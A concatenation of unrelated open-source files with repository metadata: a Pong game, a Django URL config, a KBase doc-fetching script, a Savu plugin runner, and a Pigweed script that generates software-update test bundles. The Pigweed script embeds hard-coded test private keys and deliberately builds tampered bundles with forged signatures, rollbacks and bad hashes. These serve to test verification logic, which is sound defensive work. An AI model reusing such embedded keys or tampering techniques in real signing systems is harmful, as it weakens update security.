score_point_x = (WIDTH // 4) - (score_textwidth_in_px // 2)
score_point_y = (HEIGHT // 4)
canvas.draw_text(str(score1), [score_point_x, score_point_y], FONT_SIZE, COLOR, FONT_FACE)
score_textwidth_in_px = frame.get_canvas_textwidth(str(score2), FONT_SIZE, FONT_FACE)
score_point_x = (3 * WIDTH // 4) - (score_textwidth_in_px // 2)
score_point_y = (HEIGHT // 4)
canvas.draw_text(str(score2), [score_point_x, score_point_y], FONT_SIZE, COLOR, FONT_FACE)
return None
#---------------------------------------------------------
def keep_paddle_on_screen(paddle_pos, paddle_vel):
"""
Helper function that restrict "paddle" to stay entirely
on the "canvas" by testing whether the current update
for a paddle's "position" will move part of the "paddle"
off of the screen. If it does, don't allow the update by
returning a "False" boolean value; else return "True".
Function accepts current paddle's "vertical position"
and "vertical velocity".
"""
# Compute updated (future) position of the "paddle".
paddle_pos_updated = paddle_pos + paddle_vel
# "Paddle" will be "off" (False) or "on" (True) screen.
if (HALF_PAD_HEIGHT <= paddle_pos_updated <= (HEIGHT - HALF_PAD_HEIGHT)):
return True
else:
return False
#---------------------------------------------------------
def keydown_handler(key):
"""
Event key handler. Update the values of the two vertical
"velocities" using this "key" handler.
If key is pressed, "paddle" will start to move up or
down at a constant "velocity". When key is released,
"paddle" will stop moving.
"""
# These are (global) numbers; vertical "velocity" of
# each "paddle".
global paddle1_vel, paddle2_vel
# The "w" and "s" keys should control the vertical
# "velocity" of the left "paddle" while the "Up arrow"
# and "Down arrow" key should control the "velocity" of
# the right "paddle".
if key == simplegui.KEY_MAP[MOTION_KEYS[0]]:
# If the "w" key is pressed, move up left
# "paddle".
paddle1_vel -= VERTICAL_VELOCITY
if key == simplegui.KEY_MAP[MOTION_KEYS[1]]:
# If the "s" key is pressed, move down left
# "paddle".
paddle1_vel += VERTICAL_VELOCITY
if key == simplegui.KEY_MAP[MOTION_KEYS[2]]:
# If the "Up arrow" key is pressed, move up right
# "paddle".
paddle2_vel -= VERTICAL_VELOCITY
if key == simplegui.KEY_MAP[MOTION_KEYS[3]]:
# If the "Down arrow" key is pressed, move down
# right "paddle".
paddle2_vel += VERTICAL_VELOCITY
# else motionless if none of the above keys is pressed.
return None
#---------------------------------------------------------
def keyup_handler(key):
"""
Event key handler. Update the values of the two vertical
"velocities" using this "key" handler.
If key is pressed, "paddle" will start to move up or
down at a constant "velocity". When key is released,
"paddle" will stop moving.
"""
# These are (global) numbers; vertical "velocity" of
# each "paddle".
global paddle1_vel, paddle2_vel
# The "w" and "s" keys should control the vertical
# "velocity" of the left "paddle" while the "Up arrow"
# and "Down arrow" key should control the "velocity" of
# the right "paddle".
if key == simplegui.KEY_MAP[MOTION_KEYS[0]]:
# If the "w" key is released, stop moving up left
# "paddle".
paddle1_vel = 0
if key == simplegui.KEY_MAP[MOTION_KEYS[1]]:
# If the "s" key is released, stop moving down left
# "paddle".
paddle1_vel = 0
if key == simplegui.KEY_MAP[MOTION_KEYS[2]]:
# If the "Up arrow" key is released, stop moving up
# right "paddle".
paddle2_vel = 0
if key == simplegui.KEY_MAP[MOTION_KEYS[3]]:
# If the "Down arrow" key is released, stop moving
# down right "paddle".
paddle2_vel = 0
return None
#---------------------------------------------------------
#
def button_restart_hander():
"""
Event button handler. Call "new_game()" to reset the
"paddles", "score" and relaunch the ball. Reset also
a "Timer", which will "postpone" the beginning of a
new game by the configured ammount of time.
"""
# This is (global) number; keeps track of the time in
# "seconds".
global seconds
# Check if "Timer" is Running; if yes, stop the "Timer"
# and reset global "seconds" counter.
if timer.is_running():
seconds = 0
timer.stop()
# Reset the "paddles", "score", relaunch the ball and
# start the "Timer".
new_game()
return None
#---------------------------------------------------------
def timer_handler():
"""
Event handler for "Timer" with 1 sec interval, which
increments or resets a global "time" counter.
"""
# Increment "seconds" (as global variable)
# by one each time "Timer" calls this "event handler";
# i.e. once per 1 second.
global seconds
seconds += 1
# In case where "seconds" counter gets greater than the
# number of seconds configured as the "delay"
# between two successive games, reset counter and stop
# the "Timer".
if seconds > NEW_GAME_DELAY:
seconds = 0
timer.stop()
return None
#---------------------------------------------------------
# Create frame.
frame = simplegui.create_frame("Pong", WIDTH, HEIGHT)
# Create a "Timer" by repeatedly calling the proper
# "event handler" every 1 second.
timer = simplegui.create_timer(1000, timer_handler)
# Register the "event handler" that is responsible
# for all drawing.
frame.set_draw_handler(draw_handler)
# Register "event handlers" for "control" elements.
frame.set_keydown_handler(keydown_handler)
frame.set_keyup_handler(keyup_handler)
frame.add_button("Restart", button_restart_hander, 200)
# Get a game going (almost) immediately.
new_game()
# Start frame.
frame.start()
#---------------------------------------------------------
|
{
"content_hash": "840aa55de15d9a7e24cc62019260012c",
"timestamp": "",
"source": "github",
"line_count": 492,
"max_line_length": 115,
"avg_line_length": 38.0609756097561,
"alnum_prop": 0.5908896721136387,
"repo_name": "aristotelis-metsinis/ArcadeGames",
"id": "58c0b200c04ee94f844e9238ffab08f7bef4b94e",
"size": "19151",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "pong.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "132391"
}
],
"symlink_target": ""
}
|
from django.conf.urls import patterns, url
urlpatterns = patterns(
'users.views',
url(r'^(?P<username>.+?)/$',
'user_profile',
name="user-profile"),
)
|
{
"content_hash": "22ab0661a39d6f54ab463434edce08d8",
"timestamp": "",
"source": "github",
"line_count": 9,
"max_line_length": 42,
"avg_line_length": 19.666666666666668,
"alnum_prop": 0.5819209039548022,
"repo_name": "lemonad/behorighet",
"id": "18643510f4649ab3ed33f890562fc32c62557e16",
"size": "201",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "behorighet/users/urls.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "405376"
},
{
"name": "JavaScript",
"bytes": "802587"
},
{
"name": "Python",
"bytes": "31496"
},
{
"name": "Shell",
"bytes": "222"
}
],
"symlink_target": ""
}
|
from bs4 import BeautifulSoup
#import requests
import sys
import urllib2
from HTMLParser import HTMLParser
DOCS_ROOT = 'http://www.kbase.us/services/docs/'
DEPLOY_DICT = [
{'name': 'CDM API',
'service': 'cdmi_api',
'target_dir':'kb_seed',
'html_name': 'application_api'},
{'name': 'CDM Entity-Relationship API',
'service': 'cdmi_api',
'target_dir':'kb_seed',
'html_name': 'er_api',
'html_target': 'cdmi_entity_api'},
{'name': 'ID Server API',
'service': 'idserver',
'target_dir':'idserver',
'html_name': 'idserver_client_api',
'html_target':'idserver_api'},
{'name': 'Workspace Service',
'service': 'workspaceService',
'target_dir':'workspace_service'},
#{'name': 'Assembly Service', #fixme
#'service': 'assembly',
#'target_dir': 'assembly',
#'html_name': 'assembly'}
#'html_target': 'assembly-service'},
{'name': 'Plant Expression Service',
'service': 'PlantExpressionService',
'target_dir':'plant_expression_service',
'html_name': 'PlantExpressionService'},
{'name': 'Tree Service',
'service': 'trees',
'target_dir':'trees',
'html_name': 'Tree',
'html_target':'tree'},
#{'name': 'Similarity Service',
#'service': 'sim_service',
#'target_dir':'sim_service',
#'html_name': 'sim_service'},
{'name': 'Communties API',
'service': 'communities_api',
'target_dir':'communities',
'html_name': 'CommunitiesAPI'},
{'name': 'QC Service',
'service': 'communities_qc',
'target_dir':'communities_qc',
'html_name': 'communitiesQC'},
#{'name': 'Authorization Client',
#'service': 'authorization_server',
#'target_dir':'auth',
#'html_name': 'AuthUser',
#'html_target':},
{'name': 'Genome Annotation Service',
'service': 'genome_annotation',
'target_dir':'genome_annotation',
'html_name': 'genomeanno_impl'},
{'name': 'Translation Service',
'service': 'translation',
'target_dir':'translation',
'html_name': 'MOTranslationService',
'html_target':'MOTranslationService'},
{'name': 'Networks Service',
'service': 'KBaseNetworksService',
'target_dir':'networks',
'html_name': 'KBaseNetworksService'},
{'name': 'Ontology Service',
'service': 'ontology_service',
'html_name': 'OntologyService',
'target_dir':'ontology_service',
'html_target': 'OntologyService' },
{'name': 'Protein Info Service',
'service': 'protein_info_service',
'target_dir':'protein_info_service',
'html_name': 'ProteinInfoService'},
#{'name': 'Experiment Service', #removed
#'service': 'experiment',
#'target_dir':'experiment',
#'html_name': 'experiment'},
{'name': 'FBA Modeling Service', #look at and fix
'service': 'fbaModelServices',
'target_dir':'KBaseFBAModeling',
'html_name': 'fbaModelServices'},
#{'name': 'Genotype Phenotype Service', #look at and fix
#'service': 'Genotype_PhenotypeAPI',
#'target_dir':'genotype_phenotype',
#'html_name': 'Genotype_PhenotypeAPI'},
{'name': 'PROM Service',
'service': 'prom_service',
'target_dir':'prom_service',
'html_name': 'PROM'},
{'name': 'Phispy Service',
'service': 'Phispy',
'target_dir':'phispy',
'html_name': 'Phispy'},
{'name': 'Regulation Service',
'service': 'Regulation',
'target_dir':'regulation',
'html_name': 'Regulation'},
{'name': 'Fizzy Feature Selection Service',
'service': 'feature_selection',
'target_dir':'feature_selection',
'html_name': 'Fizzy'},
]
def pull_api_doc(service, target, name, html_name=None, html_target=None):
if html_name:
url = DOCS_ROOT+service+'/'+html_name+'.html'
else:
url = DOCS_ROOT+service+'/'+service+'.html'
print "\nPulling API Doc file:", service, ' [', url, ']'
try:
r = urllib2.urlopen(url)
except (404):
return
doc_text = r.read()
content = BeautifulSoup(doc_text)
#content.find(id='NAME').replace_with(name)
try:
nav = content.find('ul', id="index").extract()
except:
nav = None
target_dir = target+'/'+'API/'
if html_target:
content_target = target_dir+html_target+'.html'
else:
content_target = target_dir+service+'.html'
f = open(content_target, 'w')
f.write(str(content.prettify()))
print 'Wrote content to:', content_target
if nav:
if html_target:
nav_target = target_dir+html_target+'_nav.html'
else:
nav_target = target_dir+service+'_nav.html'
f = open(nav_target, 'w')
f.write(str(nav.prettify()))
print 'Wrote nav to:', nav_target
print
def pull_api_docs():
for obj in DEPLOY_DICT:
service = obj['service']
target = obj['target_dir']
name = obj['name']
try:
html_name = obj['html_name']
except:
html_name = None
try:
html_target = obj['html_target']
except:
html_target = None
if html_name and html_target:
pull_api_doc(service, target, name, html_name, html_target)
elif html_name:
pull_api_doc(service, target, name, html_name)
else:
pull_api_doc(service, target, name)
def pull_readmes():
pass
if __name__ == "__main__":
pull_api_docs();
|
{
"content_hash": "1cde71bf2c3102723a9ea499865e2543",
"timestamp": "",
"source": "github",
"line_count": 219,
"max_line_length": 84,
"avg_line_length": 30.643835616438356,
"alnum_prop": 0.4714647593503204,
"repo_name": "kbase/docs",
"id": "5339b315b56f2611fb6af0729d1a3618b75b6abc",
"size": "6730",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "pull-api-docs.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "87338"
},
{
"name": "HTML",
"bytes": "33780935"
},
{
"name": "JavaScript",
"bytes": "147498"
},
{
"name": "Jupyter Notebook",
"bytes": "101314"
},
{
"name": "Makefile",
"bytes": "893"
},
{
"name": "PHP",
"bytes": "16652"
},
{
"name": "Perl",
"bytes": "18895"
},
{
"name": "Python",
"bytes": "24049"
},
{
"name": "Ruby",
"bytes": "53646"
},
{
"name": "Shell",
"bytes": "3673"
}
],
"symlink_target": ""
}
|
""" Methods for running a chain of plugins
.. module:: process
:platform: Unix
:synopsis: Methods for running a chain of plugins
.. moduleauthor:: Mark Basham <scientificsoftware@diamond.ac.uk>
"""
import os
import logging
import time
from mpi4py import MPI
import savu.plugins.utils as pu
from savu.core.utils import logfunction
def run_plugin_chain(input_data, plugin_list, processing_dir, mpi=False,
processes=["CPU0"], process=0):
"""Runs a chain of plugins
:param input_data: The input data to give to the chain
:type input_data: savu.data.structure.
:param plugin_list: Names of all the plugins to process in order.
:type plugin_list: list of str.
:param processing_dir: Location of the processing directory.
:type processing_dir: str.
:param mpi: Whether this is running in mpi, default is false.
:type mpi: bool.
"""
logging.debug("Starting run_plugin_chain")
in_data = input_data
output = None
count = 0
for plugin_name in plugin_list:
logging.debug("Loading plugin %s", plugin_name)
plugin = pu.load_plugin(plugin_name)
# generate somewhere for the data to go
file_name = os.path.join(processing_dir,
"%02i_%s.h5" % (count, plugin.name))
logging.debug("Creating output file : %s", file_name)
output = pu.create_output_data(plugin, in_data, file_name, plugin.name,
mpi)
plugin.set_parameters(None)
logging.debug("Starting processing plugin %s", plugin_name)
plugin.run_process(in_data, output, processes, process)
logging.debug("Completed processing plugin %s", plugin_name)
if in_data is not output:
in_data.complete()
in_data = output
if mpi:
logging.debug("MPI awaiting barrier")
MPI.COMM_WORLD.barrier()
count += 1
if output is not None:
output.complete()
@logfunction
def run_process_list(input_data, process_list, processing_dir, mpi=False,
processes=["CPU0"], process=0):
"""Runs a chain of plugins
:param input_data: The input data to give to the chain
:type input_data: savu.data.structure.
:param process_list: Process list.
:type process_list: savu.data.structure.ProcessList.
:param processing_dir: Location of the processing directory.
:type processing_dir: str.
:param mpi: Whether this is running in mpi, default is false.
:type mpi: bool.
"""
logging.debug("Running process list, just a check")
filename = os.path.basename(input_data.backing_file.filename)
filename = os.path.splitext(filename)[0]
output_filename = \
os.path.join(processing_dir,
"%s_processed_%s.nxs" % (filename,
time.strftime("%Y%m%d%H%M%S")))
if process == 0:
logging.debug("Running Process List.save_list_to_file")
process_list.save_list_to_file(output_filename)
in_data = input_data
output = None
logging.debug("generating all output files")
files = []
count = 0
for process_dict in process_list.process_list:
logging.debug("Loading plugin %s", process_dict['id'])
plugin = pu.load_plugin(process_dict['id'])
# generate somewhere for the data to go
file_name = os.path.join(processing_dir,
"%s%02i_%s.h5" % (process_list.name, count,
process_dict['id']))
group_name = "%i-%s" % (count, plugin.name)
logging.debug("Creating output file %s", file_name)
output = pu.create_output_data(plugin, in_data, file_name, group_name,
mpi)
files.append(output)
in_data = output
count += 1
logging.debug("processing Plugins")
in_data = input_data
count = 0
for process_dict in process_list.process_list:
logging.debug("Loading plugin %s", process_dict['id'])
plugin = pu.load_plugin(process_dict['id'])
output = files[count]
plugin.set_parameters(process_dict['data'])
logging.debug("Starting processing plugin %s", process_dict['id'])
plugin.run_process(in_data, output, processes, process)
logging.debug("Completed processing plugin %s", process_dict['id'])
if in_data is not output:
in_data.complete()
in_data = output
if mpi:
logging.debug("Blocking till all processes complete")
MPI.COMM_WORLD.Barrier()
if process == 0:
cite_info = plugin.get_citation_inforamtion()
if cite_info is not None:
process_list.add_process_citation(output_filename, count,
cite_info)
group_name = "%i-%s" % (count, plugin.name)
process_list.add_intermediate_data_link(output_filename,
output, group_name)
count += 1
if output is not None:
output.complete()
|
{
"content_hash": "d776d2b78b06dd69bb7f485e8a2e8b93",
"timestamp": "",
"source": "github",
"line_count": 154,
"max_line_length": 79,
"avg_line_length": 33.79220779220779,
"alnum_prop": 0.5920445810914681,
"repo_name": "swtp1v07/Savu",
"id": "9ee5e34b44ddce8ec7963d90c67baf0adb0f8776",
"size": "5794",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "savu/core/process.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "84400"
},
{
"name": "C++",
"bytes": "509"
},
{
"name": "Makefile",
"bytes": "2126"
},
{
"name": "Python",
"bytes": "349231"
},
{
"name": "Shell",
"bytes": "6321"
}
],
"symlink_target": ""
}
|
"""Script for generating test bundles"""
import argparse
import subprocess
import sys
from typing import Dict, Optional
from pw_software_update import dev_sign, keys, metadata, root_metadata
from pw_software_update.update_bundle_pb2 import Manifest, UpdateBundle
from pw_software_update.tuf_pb2 import (RootMetadata, SignedRootMetadata,
TargetsMetadata, SignedTargetsMetadata)
from cryptography.hazmat.primitives.asymmetric import ec
from cryptography.hazmat.primitives import serialization
HEADER = """// Copyright 2021 The Pigweed Authors
//
// Licensed under the Apache License, Version 2.0 (the "License"); you may not
// use this file except in compliance with the License. You may obtain a copy
// of the License at
//
// https://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
// WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
// License for the specific language governing permissions and limitations under
// the License.
#pragma once
#include "pw_bytes/span.h"
"""
TEST_DEV_KEY = """-----BEGIN PRIVATE KEY-----
MIGHAgEAMBMGByqGSM49AgEGCCqGSM49AwEHBG0wawIBAQQgVgMQBOTJyx1xOafy
WTs2VkACf7Uo3RbP9Vun+oKXtMihRANCAATV7XJljxeUs2z2wqM5Q/kohAra1620
zXT90N9a3UR+IHksTd1OA7wFq220IQB/e4eVzbcOprN0MMMuSgXMxL8p
-----END PRIVATE KEY-----"""
TEST_PROD_KEY = """-----BEGIN PRIVATE KEY-----
MIGHAgEAMBMGByqGSM49AgEGCCqGSM49AwEHBG0wawIBAQQg73MLNmB/fPNX75Pl
YdynPtJkM2gGOWfIcHDuwuxSQmqhRANCAARpvjrXkjG2Fp+ZgREtxeTBBmJmWGS9
8Ny2tXY+Qggzl77G7wvCNF5+koz7ecsV6sKjK+dFiAXOIdqlga7p2j0A
-----END PRIVATE KEY-----"""
TEST_TARGETS_DEV_KEY = """-----BEGIN PRIVATE KEY-----
MIGHAgEAMBMGByqGSM49AgEGCCqGSM49AwEHBG0wawIBAQQggRCrido5vZOnkULH
sxQDt9Qoe/TlEKoqa1bhO1HFbi6hRANCAASVwdXbGWM7+f/r+Z2W6Dbd7CQA0Cbb
pkBv5PnA+DZnCkFhLW2kTn89zQv8W1x4m9maoINp9QPXQ4/nXlrVHqDg
-----END PRIVATE KEY-----"""
TEST_TARGETS_PROD_KEY = """-----BEGIN PRIVATE KEY-----
MIGHAgEAMBMGByqGSM49AgEGCCqGSM49AwEHBG0wawIBAQQgx2VdB2EsUKghuLMG
RmxzqX2jnLTq5pxsFgO5Rrf5jlehRANCAASVijeDpemxVSlgZOOW0yvwE5QkXkq0
geWonkusMP0+MXopnmN0QlpgaCnG40TSr/W+wFjRmNCklL4dXk01oCwD
-----END PRIVATE KEY-----"""
TEST_ROOT_VERSION = 2
TEST_TARGETS_VERSION = 2
USER_MANIFEST_FILE_NAME = 'user_manifest'
TARGET_FILES = {
'file1': 'file 1 content'.encode(),
'file2': 'file 2 content'.encode(),
USER_MANIFEST_FILE_NAME: 'user manfiest content'.encode(),
}
def byte_array_declaration(data: bytes, name: str) -> str:
"""Generates a byte C array declaration for a byte array"""
type_name = '[[maybe_unused]] const std::byte'
byte_str = ''.join([f'std::byte{{0x{b:02x}}},' for b in data])
array_body = f'{{{byte_str}}}'
return f'{type_name} {name}[] = {array_body};'
def proto_array_declaration(proto, name: str) -> str:
"""Generates a byte array declaration for a proto"""
return byte_array_declaration(proto.SerializeToString(), name)
def private_key_public_pem_bytes(key: ec.EllipticCurvePrivateKey) -> bytes:
"""Serializes the public part of a private key in PEM format"""
return key.public_key().public_bytes(
serialization.Encoding.PEM,
serialization.PublicFormat.SubjectPublicKeyInfo)
def private_key_private_pem_bytes(key: ec.EllipticCurvePrivateKey) -> bytes:
"""Serializes the private part of a private key in PEM format"""
return key.private_bytes(encoding=serialization.Encoding.PEM,
format=serialization.PrivateFormat.PKCS8,
encryption_algorithm=serialization.NoEncryption())
class Bundle:
"""A helper for test UpdateBundle generation"""
def __init__(self):
self._root_dev_key = serialization.load_pem_private_key(
TEST_DEV_KEY.encode(), None)
self._root_prod_key = serialization.load_pem_private_key(
TEST_PROD_KEY.encode(), None)
self._targets_dev_key = serialization.load_pem_private_key(
TEST_TARGETS_DEV_KEY.encode(), None)
self._targets_prod_key = serialization.load_pem_private_key(
TEST_TARGETS_PROD_KEY.encode(), None)
self._payloads: Dict[str, bytes] = {}
# Adds some update files.
for key, value in TARGET_FILES.items():
self.add_payload(key, value)
def add_payload(self, name: str, payload: bytes) -> None:
"""Adds a payload to the bundle"""
self._payloads[name] = payload
def generate_dev_root_metadata(self) -> RootMetadata:
"""Generates a root metadata with the dev key"""
# The dev root metadata contains both the prod and the dev public key,
# so that it can rotate to prod. But it will only use a dev targets
# key.
return root_metadata.gen_root_metadata(
root_metadata.RootKeys([
private_key_public_pem_bytes(self._root_dev_key),
private_key_public_pem_bytes(self._root_prod_key),
]),
root_metadata.TargetsKeys(
[private_key_public_pem_bytes(self._targets_dev_key)]),
TEST_ROOT_VERSION)
def generate_prod_root_metadata(self) -> RootMetadata:
"""Generates a root metadata with the prod key"""
# The prod root metadta contains only the prod public key and uses the
# prod targets key
return root_metadata.gen_root_metadata(
root_metadata.RootKeys(
[private_key_public_pem_bytes(self._root_prod_key)]),
root_metadata.TargetsKeys(
[private_key_public_pem_bytes(self._targets_prod_key)]),
TEST_ROOT_VERSION)
def generate_dev_signed_root_metadata(self) -> SignedRootMetadata:
"""Generates a dev signed root metadata"""
signed_root = SignedRootMetadata()
root_metadata_proto = self.generate_dev_root_metadata()
signed_root.serialized_root_metadata = \
root_metadata_proto.SerializeToString()
return dev_sign.sign_root_metadata(
signed_root, private_key_private_pem_bytes(self._root_dev_key))
def generate_prod_signed_root_metadata(
self,
root_metadata_proto: Optional[RootMetadata] = None
) -> SignedRootMetadata:
"""Generates a root metadata signed by the prod key"""
if not root_metadata_proto:
root_metadata_proto = self.generate_prod_root_metadata()
signed_root = SignedRootMetadata(
serialized_root_metadata=root_metadata_proto.SerializeToString())
return dev_sign.sign_root_metadata(
signed_root, private_key_private_pem_bytes(self._root_prod_key))
def generate_targets_metadata(self) -> TargetsMetadata:
"""Generates the targets metadata"""
targets = metadata.gen_targets_metadata(self._payloads,
metadata.DEFAULT_HASHES,
TEST_TARGETS_VERSION)
return targets
def generate_unsigned_bundle(
self,
targets_metadata: Optional[TargetsMetadata] = None,
signed_root_metadata: Optional[SignedRootMetadata] = None
) -> UpdateBundle:
"""Generate an unsigned (targets metadata) update bundle"""
bundle = UpdateBundle()
if not targets_metadata:
targets_metadata = self.generate_targets_metadata()
if signed_root_metadata:
bundle.root_metadata.CopyFrom(signed_root_metadata)
bundle.targets_metadata['targets'].CopyFrom(
SignedTargetsMetadata(serialized_targets_metadata=targets_metadata.
SerializeToString()))
for name, payload in self._payloads.items():
bundle.target_payloads[name] = payload
return bundle
def generate_dev_signed_bundle(
self,
targets_metadata_override: Optional[TargetsMetadata] = None,
signed_root_metadata: Optional[SignedRootMetadata] = None
) -> UpdateBundle:
"""Generate a dev signed update bundle"""
return dev_sign.sign_update_bundle(
self.generate_unsigned_bundle(targets_metadata_override,
signed_root_metadata),
private_key_private_pem_bytes(self._targets_dev_key))
def generate_prod_signed_bundle(
self,
targets_metadata_override: Optional[TargetsMetadata] = None,
signed_root_metadata: Optional[SignedRootMetadata] = None
) -> UpdateBundle:
"""Generate a prod signed update bundle"""
# The targets metadata in a prod signed bundle can only be verified
# by a prod signed root. Because it is signed by the prod targets key.
# The prod signed root however, can be verified by a dev root.
return dev_sign.sign_update_bundle(
self.generate_unsigned_bundle(targets_metadata_override,
signed_root_metadata),
private_key_private_pem_bytes(self._targets_prod_key))
def generate_manifest(self) -> Manifest:
"""Generates the manifest"""
manifest = Manifest()
manifest.targets_metadata['targets'].CopyFrom(
self.generate_targets_metadata())
if USER_MANIFEST_FILE_NAME in self._payloads:
manifest.user_manifest = self._payloads[USER_MANIFEST_FILE_NAME]
return manifest
def parse_args():
"""Setup argparse."""
parser = argparse.ArgumentParser()
parser.add_argument("output_header",
help="output path of the generated C header")
return parser.parse_args()
def main() -> int:
"""Main"""
# TODO(b/237580538): Refactor the code so that each test bundle generation
# is done in a separate function or script.
# pylint: disable=too-many-locals
args = parse_args()
test_bundle = Bundle()
dev_signed_root = test_bundle.generate_dev_signed_root_metadata()
dev_signed_bundle = test_bundle.generate_dev_signed_bundle()
dev_signed_bundle_with_root = test_bundle.generate_dev_signed_bundle(
signed_root_metadata=dev_signed_root)
unsigned_bundle_with_root = test_bundle.generate_unsigned_bundle(
signed_root_metadata=dev_signed_root)
manifest_proto = test_bundle.generate_manifest()
prod_signed_root = \
test_bundle.generate_prod_signed_root_metadata()
prod_signed_bundle = test_bundle.generate_prod_signed_bundle(
None, prod_signed_root)
dev_signed_bundle_with_prod_root = test_bundle.generate_dev_signed_bundle(
signed_root_metadata=prod_signed_root)
# Generates a prod root metadata that fails signature verification against
# the dev root (i.e. it has a bad prod signature). This is done by making
# a bad prod signature.
bad_prod_signature = test_bundle.generate_prod_root_metadata()
signed_bad_prod_signature = \
test_bundle\
.generate_prod_signed_root_metadata(
bad_prod_signature)
# Compromises the signature.
signed_bad_prod_signature.signatures[0].sig = b'1' * 64
signed_bad_prod_signature_bundle = test_bundle.generate_prod_signed_bundle(
None, signed_bad_prod_signature)
# Generates a prod root metadtata that fails to verify itself. Specifically,
# the prod signature cannot be verified by the key in the incoming root
# metadata. This is done by dev signing a prod root metadata.
signed_mismatched_root_key_and_signature = SignedRootMetadata(
serialized_root_metadata=test_bundle.generate_prod_root_metadata(
).SerializeToString())
dev_root_key = serialization.load_pem_private_key(TEST_DEV_KEY.encode(),
None)
signature = keys.create_ecdsa_signature(
signed_mismatched_root_key_and_signature.serialized_root_metadata,
private_key_private_pem_bytes(dev_root_key)) # type: ignore
signed_mismatched_root_key_and_signature.signatures.append(signature)
mismatched_root_key_and_signature_bundle = test_bundle\
.generate_prod_signed_bundle(None,
signed_mismatched_root_key_and_signature)
# Generates a prod root metadata with rollback attempt.
root_rollback = test_bundle.generate_prod_root_metadata()
root_rollback.common_metadata.version = TEST_ROOT_VERSION - 1
signed_root_rollback = test_bundle.\
generate_prod_signed_root_metadata(root_rollback)
root_rollback_bundle = test_bundle.generate_prod_signed_bundle(
None, signed_root_rollback)
# Generates a bundle with a bad target signature.
bad_targets_siganture = test_bundle.generate_prod_signed_bundle(
None, prod_signed_root)
# Compromises the signature.
bad_targets_siganture.targets_metadata['targets'].signatures[
0].sig = b'1' * 64
# Generates a bundle with rollback attempt
targets_rollback = test_bundle.generate_targets_metadata()
targets_rollback.common_metadata.version = TEST_TARGETS_VERSION - 1
targets_rollback_bundle = test_bundle.generate_prod_signed_bundle(
targets_rollback, prod_signed_root)
# Generate bundles with mismatched hash
mismatched_hash_targets_bundles = []
# Generate bundles with mismatched file length
mismatched_length_targets_bundles = []
# Generate bundles with missing hash
missing_hash_targets_bundles = []
# Generate bundles with personalized out payload
personalized_out_bundles = []
# For each of the two files in `TARGET_FILES`, we generate a number of
# bundles each of which modify the target in the following way
# respectively:
# 1. Compromise its sha256 hash value in the targets metadata, so as to
# test hash verification logic.
# 2. Remove the hashes, to trigger verification failure cause by missing
# hashes.
# 3. Compromise the file length in the targets metadata.
# 4. Remove the payload to emulate being personalized out, so as to test
# that it does not cause verification failure.
for idx, payload_file in enumerate(TARGET_FILES.items()):
mismatched_hash_targets = test_bundle.generate_targets_metadata()
mismatched_hash_targets.target_files[idx].hashes[0].hash = b'0' * 32
mismatched_hash_targets_bundle = test_bundle\
.generate_prod_signed_bundle(
mismatched_hash_targets, prod_signed_root)
mismatched_hash_targets_bundles.append(mismatched_hash_targets_bundle)
mismatched_length_targets = test_bundle.generate_targets_metadata()
mismatched_length_targets.target_files[idx].length = 1
mismatched_length_targets_bundle = test_bundle\
.generate_prod_signed_bundle(
mismatched_length_targets, prod_signed_root)
mismatched_length_targets_bundles.append(
mismatched_length_targets_bundle)
missing_hash_targets = test_bundle.generate_targets_metadata()
missing_hash_targets.target_files[idx].hashes.pop()
missing_hash_targets_bundle = test_bundle.generate_prod_signed_bundle(
missing_hash_targets, prod_signed_root)
missing_hash_targets_bundles.append(missing_hash_targets_bundle)
file_name, _ = payload_file
personalized_out_bundle = test_bundle.generate_prod_signed_bundle(
None, prod_signed_root)
personalized_out_bundle.target_payloads.pop(file_name)
personalized_out_bundles.append(personalized_out_bundle)
with open(args.output_header, 'w') as header:
header.write(HEADER)
header.write(
proto_array_declaration(dev_signed_bundle, 'kTestDevBundle'))
header.write(
proto_array_declaration(dev_signed_bundle_with_root,
'kTestDevBundleWithRoot'))
header.write(
proto_array_declaration(unsigned_bundle_with_root,
'kTestUnsignedBundleWithRoot'))
header.write(
proto_array_declaration(dev_signed_bundle_with_prod_root,
'kTestDevBundleWithProdRoot'))
header.write(
proto_array_declaration(manifest_proto, 'kTestBundleManifest'))
header.write(proto_array_declaration(dev_signed_root,
'kDevSignedRoot'))
header.write(
proto_array_declaration(prod_signed_bundle, 'kTestProdBundle'))
header.write(
proto_array_declaration(mismatched_root_key_and_signature_bundle,
'kTestMismatchedRootKeyAndSignature'))
header.write(
proto_array_declaration(signed_bad_prod_signature_bundle,
'kTestBadProdSignature'))
header.write(
proto_array_declaration(bad_targets_siganture,
'kTestBadTargetsSignature'))
header.write(
proto_array_declaration(targets_rollback_bundle,
'kTestTargetsRollback'))
header.write(
proto_array_declaration(root_rollback_bundle, 'kTestRootRollback'))
for idx, mismatched_hash_bundle in enumerate(
mismatched_hash_targets_bundles):
header.write(
proto_array_declaration(
mismatched_hash_bundle,
f'kTestBundleMismatchedTargetHashFile{idx}'))
for idx, missing_hash_bundle in enumerate(
missing_hash_targets_bundles):
header.write(
proto_array_declaration(
missing_hash_bundle,
f'kTestBundleMissingTargetHashFile{idx}'))
for idx, mismatched_length_bundle in enumerate(
mismatched_length_targets_bundles):
header.write(
proto_array_declaration(
mismatched_length_bundle,
f'kTestBundleMismatchedTargetLengthFile{idx}'))
for idx, personalized_out_bundle in enumerate(
personalized_out_bundles):
header.write(
proto_array_declaration(
personalized_out_bundle,
f'kTestBundlePersonalizedOutFile{idx}'))
subprocess.run([
'clang-format',
'-i',
args.output_header,
], check=True)
# TODO(b/237580538): Refactor the code so that each test bundle generation
# is done in a separate function or script.
# pylint: enable=too-many-locals
return 0
if __name__ == "__main__":
sys.exit(main())
|
{
"content_hash": "f6bd6cb8aca335687adabed92fcc262b",
"timestamp": "",
"source": "github",
"line_count": 432,
"max_line_length": 80,
"avg_line_length": 43.354166666666664,
